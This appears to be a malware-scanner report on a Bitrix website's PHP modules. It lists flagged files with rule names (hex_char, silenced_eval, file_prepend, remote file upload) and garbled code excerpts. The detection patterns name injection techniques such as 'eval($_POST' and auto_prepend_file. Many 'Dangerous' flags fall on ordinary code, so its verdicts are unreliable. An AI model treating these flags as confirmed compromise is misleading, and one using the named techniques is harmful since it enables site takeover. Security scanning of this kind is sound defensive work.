Exploit hex_char Line: 37 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/terasmsru.php

Size: 16.63 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 85 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/mirsms_ru.php

Size: 11.97 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 14 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsc_ru.php

Size: 18.86 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smspilot_ru.php

Size: 15.58 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 21 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms48_ru.php

Size: 9.63 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 24 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/webcom_mobi.php

Size: 17.53 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 16 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms2ru.php

Size: 11.66 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 46 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsgk_ru.php

Size: 17.50 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 14 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/iqsms.php

Size: 23.09 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 60 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsc.php

Size: 23.10 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 58 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms_by.php

Size: 9.94 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 34 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsprofi.php

Size: 22.87 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 167 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/it_sms_ru.php

Size: 17.49 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 16 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsis_ru.php

Size: 18.91 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/megalabs_ru.php

Size: 9.20 kB Created: 2024-03-13 06:23:26 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/marketolog_mts_ru.php

Size: 11.52 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 16 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/qtelecom_ru.php

Size: 11.45 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 14 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sigmasms_ru.php

Size: 12.01 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 63 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/iqsms_ru.php

Size: 10.70 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 26 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/tele2_ru_target.php

Size: 9.74 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 34 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/beeline_amega_inform_ru.php

Size: 8.88 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsp_by.php

Size: 16.82 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 27 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/stream_telecom_ru.php

Size: 9.11 kB Created: 2024-03-13 06:23:27 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms_agent_ru.php

Size: 10.72 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 26 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/ssms_su.php

Size: 10.81 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 19 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/websms_ru.php

Size: 10.75 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 32 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/mainsms_ru.php

Size: 10.19 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 16 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsprofi_ru.php

Size: 17.94 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 23 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/mail/classes/general/mail.php

Size: 115.42 kB Created: 2022-12-02 17:29:59 Modified: 2025-02-03 05:36:39 Warns: 1 Dangers: 1
DescriptionMatch

Exploit silenced_eval Line: 2973 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($code)

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($code); ob_end_clean(); if($php_errormsg != ""CMailError::SetError("B_MAIL_ERR_PHP"GetMessage("MAIL_CL_ERR_IN_PHP").$field_name.". (".$php_errormsg.")"); $php_errormsg $php_errormsg_previni_set("track_errors"$prev); } public static function CheckConditionTypes($fields) { if(is_set($fields'CONDITIONS')) { $errors = []; $whiteList = [ 'TYPE''STRINGS''COMPARE_TYPE''ID''FILTER_ID', ]; foreach ($fields['CONDITIONS'] as $item) { foreach ($item as $key => $value) { if(!in_array...

/home/web/web/vsavto.com/public_html/bitrix/modules/mail/lib/helper/mailbox/imap.php

Size: 54.10 kB Created: 2022-12-02 17:29:59 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Sign 876d76e8 Line: 1374 Dangerous

Malware Signature (hash: 876d76e8)

$fetcher(sprintf(

/home/web/web/vsavto.com/public_html/bitrix/modules/mail/admin/mail_smtpd_manager.php

Size: 2.44 kB Created: 2022-12-02 17:30:00 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($cmd$op); } } if ($startErrorMessage == ''$res "success"; else $res $startErrorMessage; break; case 'stop'$CACHE_MANAGER->Read(3600000$cache_id "smtpd_stop"); $CACHE_MANAGER->Set($cache_idtrue); break; case 'stats'$res false; if($CACHE_MANAGER->Read(3600000$cache_id "smtpd_stats")) { $res $CACHE_MANAGER->Get($cache_id); $res["uptime"] = time() - $res["started"]; } break; } echo CUtil::PhpToJSObject($resfalse); ?>
<? 
require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/mod...

/home/web/web/vsavto.com/public_html/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/script.php

Size: 11.35 kB Created: 2022-12-02 17:30:06 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/home/web/web/vsavto.com/public_html/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/script.php

Size: 22.93 kB Created: 2022-12-02 17:30:06 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function eval Line: 97 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/home/web/web/vsavto.com/public_html/bitrix/modules/blog/install/components/bitrix/blog.post.comment/templates/.default/scripts_for_editor.php

Size: 15.25 kB Created: 2022-12-02 17:30:06 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(scripts[s].JS);
                        }
                    }
                    
                    
BX.ajax.processScripts(scriptstrue);
//                    commentEr object may be set in template
                    
if(window.commentEr && window.commentEr == "Y")
                    {
                        
BX('err_comment_'+this.id[1]).innerHTML data;
                    }
                    else
                    {
                        if(
BX('edit_id').value 0)
                        {
                            var 
commentId 'blg-comment-'+this.id[1];
                            if(
BX(commentId))
                            {
                                var 
newComment BX.create('div',{'html':data});    // tmp container for data
//                                paste resp...

/home/web/web/vsavto.com/public_html/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/.default/script.php

Size: 26.06 kB Created: 2022-12-02 17:30:07 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function eval Line: 140 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/home/web/web/vsavto.com/public_html/bitrix/modules/highloadblock/lib/highloadblocktable.php

Size: 19.60 kB Created: 2022-12-02 17:30:07 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($eval); } $entity $entity_data_class::getEntity(); $uFields $USER_FIELD_MANAGER->getUserFields(static::compileEntityId($hlblock['ID'])); foreach ($uFields as $uField) { if ($uField['MULTIPLE'] == 'N') { $params = array( 'required' => $uField['MANDATORY'] == 'Y' ); $field $USER_FIELD_MANAGER->getEntityField($uField$uField['FIELD_NAME'], $params); $entity->addField($field); foreach ($USER_FIELD_MANAGER->getEntityReferences($uField$field) as $reference) { $entity->addField($reference...

/home/web/web/vsavto.com/public_html/bitrix/modules/dwstroy.pricechanger/classes/general/pricechanger.php

Size: 58.79 kB Created: 2024-02-26 07:56:22 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($formula); CPrice::Update($ar_res'ID' ], array ('PRICE' => $x)); $usedPrices[ ] = $ar_res'CATALOG_GROUP_ID' ]; } $priceFilter = array (); if ($data'What' ] != 'Price_All'){ $priceFilter'ID' ] = $filter'CATALOG_GROUP_ID' ]; } $dbPriceType CCatalogGroup::GetList( array ("SORT" => "ASC"), $priceFilter ); while ($arPriceType $dbPriceType->Fetch()){ if (in_array($arPriceType'ID' ], $usedPrices)){ continue; } $formula $f; foreach ($step'PRICE' ] as $p){ $new_price = (isset($ar...

/home/web/web/vsavto.com/public_html/bitrix/modules/statistic/options.php

Size: 37.49 kB Created: 2022-12-02 17:30:10 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($func); } } } } COption::SetOptionString($module_id"IP_LOOKUP_CLASS"$IP_LOOKUP_CLASS); COption::SetOptionString($module_id"ADV_EVENTS_DEFAULT"$ADV_EVENTS_DEFAULT); COption::SetOptionString($module_id"USE_AUTO_OPTIMIZE"$USE_AUTO_OPTIMIZE); InitBVar($recount_base_currency); if ($recount_base_currency=="Y"CStatistics::RecountBaseCurrency($BASE_CURRENCY); COption::SetOptionString($module_id"BASE_CURRENCY"$BASE_CURRENCY); $arr = array(); $arr preg_split("/[\n\r]+/"$BROWSERS...

/home/web/web/vsavto.com/public_html/bitrix/modules/report/install/components/bitrix/report.view/templates/admin/template.php

Size: 55.11 kB Created: 2022-12-02 17:30:11 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('response = ' data);
                if (
response)
                {
                    if (
response.imageData)
                    {
                        if (
response.imageData.substr(0,10) === 'data:image')
                        {
                            
img BX('report-chart-image');
                            
img.src response.imageData;
                            if (
response.legendInfo)
                            {
                                var 
legendContainer BX('report-chart-legend-container');
                                var 
legendRowExample BX('report-chart-legend-row-example');
                                var 
chartType requestData['type'];
                                var 
legendNewRowlegendSticklegend...

/home/web/web/vsavto.com/public_html/bitrix/modules/report/install/components/bitrix/report.construct/templates/.default/template.php

Size: 40.26 kB Created: 2022-12-02 17:30:11 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(ySelects[i].name))
            {
                
colId match[1];
                if (
colId !== null && yColumnsIndexes[colId] !== null)
                    
setSelectValue(ySelects[i], yColumnsIndexes[colId]);
            }
        }
        var 
chartCheckbox BX('report-chart-display-checkbox');
        if (
chartCheckbox)
        {
            
BX.bind(chartCheckbox'click', function () {
                var 
chartSwitchBlock BX('report-chart-switch');
                var 
chartParamsBlock BX('report-chart-params');
                if (
chartSwitchBlock)
                {
                    if (
this.checkedBX.addClass(chartSwitchBloc...

/home/web/web/vsavto.com/public_html/bitrix/modules/report/install/components/bitrix/report.construct/templates/admin/template.php

Size: 40.02 kB Created: 2022-12-02 17:30:11 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(ySelects[i].name))
            {
                
colId match[1];
                if (
colId !== null && yColumnsIndexes[colId] !== null)
                    
setSelectValue(ySelects[i], yColumnsIndexes[colId]);
            }
        }
        var 
chartCheckbox BX('report-chart-display-checkbox');
        if (
chartCheckbox)
        {
            
BX.bind(chartCheckbox'click', function () {
                var 
chartSwitchBlock BX('report-chart-switch');
                var 
chartParamsBlock BX('report-chart-params');
                if (
chartSwitchBlock)
                {
                    if (
this.checkedBX.addClass(chartSwitchBloc...

/home/web/web/vsavto.com/public_html/bitrix/modules/report/lib/internals/controller.php

Size: 15.25 kB Created: 2022-12-02 17:30:12 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { try { if($this->request->isPost()) { \CUtil::jSPostUnescape(); $this->request->addFilter(new PostDecodeFilter); } $this->resolveAction(); $this->checkAction(); $this->checkRequiredModules(); if(!$this->prepareParams()) { $this->sendJsonErrorResponse(); } $action $this->getAction(); if( $this->processBeforeAction($action) === true && $this->triggerOnBeforeAction($action) === true ) { $this->runAction(); } } catch(\Exception $e) { $this->runProcessingException($e); } } protected functio...

/home/web/web/vsavto.com/public_html/bitrix/modules/lists/install/components/bitrix/lists.element.edit/component.php

Size: 33.70 kB Created: 2022-12-02 17:30:12 Modified: 2025-02-03 05:36:40 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 606 Dangerous

Malware Signature (hash: 11413268)

eval($_POST

/home/web/web/vsavto.com/public_html/bitrix/modules/lists/lib/internals/controller.php

Size: 10.36 kB Created: 2022-12-02 17:30:13 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { try { if($this->request->isPost()) { \CUtil::jSPostUnescape(); $this->request->addFilter(new PostDecodeFilter); } $this->resolveAction(); $this->checkAction(); $this->checkRequiredModules(); if(!$this->prepareParams()) { $this->sendJsonErrorResponse(); } if($this->processBeforeAction($this->getAction()) !== false) { $this->runAction(); } } catch(\Exception $e) { $this->runProcessingException($e); } } protected function getUser() { global $USER; return $USER; } protected function sendJso...

/home/web/web/vsavto.com/public_html/bitrix/modules/mobileapp/install/components/bitrix/mobileapp.menu/templates/.default/template.php

Size: 12.57 kB Created: 2022-12-02 17:30:13 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec("showAuthForm");
                }
            }
    <?endif;
?>

    if(BX.PULL)
    {
        BX.addCustomEvent("onPullExtendWatch", function(data) {
            BX.PULL.extendWatch(data.id);
        });

        BX.addCustomEvent("thisPageWillDie", function(data) {
            BX.PULL.clearWatch(data.page_id);
        });

        BX.addCustomEvent("onPullEvent", function (module_id, command, params)
        {
            if (module_id == 'main' && (command == 'user_authorize' || command == 'user_logout' || command == 'online_list'))
            {
                //app.onCustomEvent('onPullOnline', {...

/home/web/web/vsavto.com/public_html/bitrix/modules/search/default_option.php

Size: 742.00 B Created: 2022-12-02 17:30:14 Modified: 2025-02-03 05:36:40 Dangers: 1
DescriptionMatch

Sign b236d073 Line: 4 Dangerous

Malware Signature (hash: b236d073)

/*;*/

/home/web/web/vsavto.com/public_html/bitrix/modules/sender/lib/integration/crm/connectors/querycount.php

Size: 5.88 kB Created: 2022-12-02 17:30:16 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($query$dataTypeId); } public static function getCount(Entity\Query $query$dataTypeId null) { self::prepare($query$dataTypeId); return self::exec($query$dataTypeId); } public static function getPreparedCountEntity\Query $querystring $entityDbNamestring $entityName$dataTypeId null ) { self::prepare($query$dataTypeId$entityDbName$entityName); return self::exec($query$dataTypeId$entityDbName$entityName); } protected static function exec(Entity\Query $query$data...

/home/web/web/vsavto.com/public_html/bitrix/modules/sender/lib/integration/crm/connectors/querydata.php

Size: 3.55 kB Created: 2022-12-02 17:30:16 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($query); } private static function prepare(Entity\Query $query$dataTypeId null) { $fields self::getSelectFields(); foreach ($fields as $alias => $field) { if (is_numeric($alias)) { $alias ''; } $query->addGroup('ID'); $query->addSelect($field$alias); } return Helper::prepareQuery($query$dataTypeId); } private static function exec(Entity\Query $query) { $result $query->exec(); $result->addFetchDataModifier( function ($data) { { if (isset($data['EMAIL_MAILING']) && $data['EMAIL_...

/home/web/web/vsavto.com/public_html/bitrix/modules/esol.massedit/lib/processor.php

Size: 72.85 kB Created: 2024-02-27 04:48:50 Modified: 2025-02-03 05:36:40 Warns: 2
DescriptionMatch

Exploit infected_comment Line: 181 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*Props*/

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($command); } } $val trim($val); $val2 trim($val2); $lowerVal ToLower($val); $lowerVal2 ToLower($val2); if(isset($this->arFieldList[$field]) && $this->arFieldList[$field]['type']=='date') { $floatVal MakeTimeStamp($val); if(strpos($cond'LAST_N_DAYS')!==false$floatVal2 time() - $val2*24*60*60; else $floatVal2 MakeTimeStamp($val2); } else { $floatVal $this->GetFloatVal($val); $floatVal2 $this->GetFloatVal($val2); } if(($cond=='EQ' && $lowerVal==$lowerVal2) || ($cond=='NEQ...

/home/web/web/vsavto.com/public_html/bitrix/modules/esol.massedit/lib/utils.php

Size: 7.23 kB Created: 2024-02-27 04:48:50 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec('crontab -l'$arLines); if(is_array($arLines)) { $cfg_data implode("\n"$arLines); } if(strlen(trim($cfg_data))==&& file_exists($_SERVER["DOCUMENT_ROOT"]."/bitrix/crontab/crontab.cfg")) { $cfg_data file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/crontab/crontab.cfg"); } $pattern "#^.*?".preg_quote('/bitrix/php_interface/include/'.static::$moduleId.'/cron_frame.php')." +".$profileId." *>.*?$#im"; if($arAutostart['TYPE']=='CRON') { $periodType $arAutostart['CRON']['PERIOD_TYP...

/home/web/web/vsavto.com/public_html/bitrix/modules/esol.massedit/admin/profile.php

Size: 21.30 kB Created: 2024-02-27 04:46:25 Modified: 2025-02-03 05:36:40 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec('crontab -l'$arLines); if(is_array($arLines)) { foreach($arLines as $line) { $arLineParts preg_split('/\s+/'$line); if(isset($arLineParts[5]) && !in_array($arLineParts[5], $arPaths) && stripos($arLineParts[5], 'php')!==false) { $arPaths[] = $arLineParts[5]; } } } $arVersions = array(); $arCheckedVersions = array(); if($checkPath && count($arPaths) > 1) { foreach($arPaths as $phpPath) { $arPhpLines = array(); $command $phpPath.' -v'; @exec($command$arPhpLines); if(is_array($arPhpLi...

/home/web/web/vsavto.com/public_html/bitrix/modules/security/classes/general/system_information.php

Size: 8.56 kB Created: 2022-12-02 17:30:18 Modified: 2025-02-03 05:36:41 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 387 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/home/web/web/vsavto.com/public_html/bitrix/modules/security/classes/general/event.php

Size: 5.48 kB Created: 2022-12-02 17:30:18 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function syslog Warning

Potentially dangerous function `syslog`

[https://www.php.net/syslog]

syslog($this->syslogPriority$message); } if ($this->isFileEngineActive) { if (!$message$message $this->messageFormatter->format($auditType$itemName$itemDescription); $message = static::sanitizeMessage($message); $message .= "\n"$savedInFile file_put_contents($this->filePath$messageFILE_APPEND) > 0; } return ($savedInDB || $savedInSyslog || $savedInFile); } public static function getSyslogPriorities() { return static::$syslogPriorities; } public static function getSyslogFaciliti...

/home/web/web/vsavto.com/public_html/bitrix/modules/security/classes/general/tests/environment.php

Size: 14.09 kB Created: 2022-12-02 17:30:18 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

posix_getpwuid($uid); return sprintf('%s(%s)'$uid['name'], $uid['uid']); } return $uid; } protected static function formatGID($gid) { if(is_callable("posix_getgrgid")) { $gid posix_getgrgid($gid); return sprintf('%s(%s)'$gid['name'], $gid['gid']); } return $gid; } protected static function formatFilePermissions($perms) { if (($perms 0xC000) == 0xC000) { $info 's'; } elseif (($perms 0xA000) == 0xA000) { $info 'l'; } elseif (($perms 0x8000) == 0x8000) { $info '-'; } elseif (($per...

/home/web/web/vsavto.com/public_html/bitrix/modules/security/classes/general/antivirus.php

Size: 44.35 kB Created: 2022-12-02 17:30:18 Modified: 2025-02-03 05:36:41 Dangers: 1
DescriptionMatch

Exploit download_remote_code2 Line: 534 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($f"\n------------------------------\n\$_SERVER:\n")

/home/web/web/vsavto.com/public_html/bitrix/modules/security/classes/general/post_filter.php

Size: 6.63 kB Created: 2022-12-02 17:30:18 Modified: 2025-02-03 05:36:41 Dangers: 1
DescriptionMatch

Exploit download_remote_code2 Line: 163 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($f"\n------------------------------\n\$_SERVER:\n")

/home/web/web/vsavto.com/public_html/bitrix/modules/security/lang/en/classes/general/tests/php_configuration.php

Size: 5.02 kB Created: 2022-12-02 17:30:19 Modified: 2025-02-03 05:36:41 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 25 Dangerous

Malware Signature (hash: 11413268)

exploit

/home/web/web/vsavto.com/public_html/bitrix/modules/security/lang/en/classes/general/tests/environment.php

Size: 5.08 kB Created: 2022-12-02 17:30:19 Modified: 2025-02-03 05:36:41 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 20 Dangerous

Malware Signature (hash: 11413268)

exploit

/home/web/web/vsavto.com/public_html/bitrix/modules/security/lang/en/admin/security_antivirus.php

Size: 2.24 kB Created: 2022-12-02 17:30:19 Modified: 2025-02-03 05:36:41 Dangers: 1
DescriptionMatch

Exploit file_prepend Line: 13 Dangerous

LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine

php_value auto_prepend_file

/home/web/web/vsavto.com/public_html/bitrix/modules/security/lang/ru/admin/security_antivirus.php

Size: 3.09 kB Created: 2022-12-02 17:30:19 Modified: 2025-02-03 05:36:41 Dangers: 1
DescriptionMatch

Exploit file_prepend Line: 12 Dangerous

LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine

php_value auto_prepend_file

/home/web/web/vsavto.com/public_html/bitrix/modules/catalog/general/discount.php

Size: 126.65 kB Created: 2022-12-02 17:30:19 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

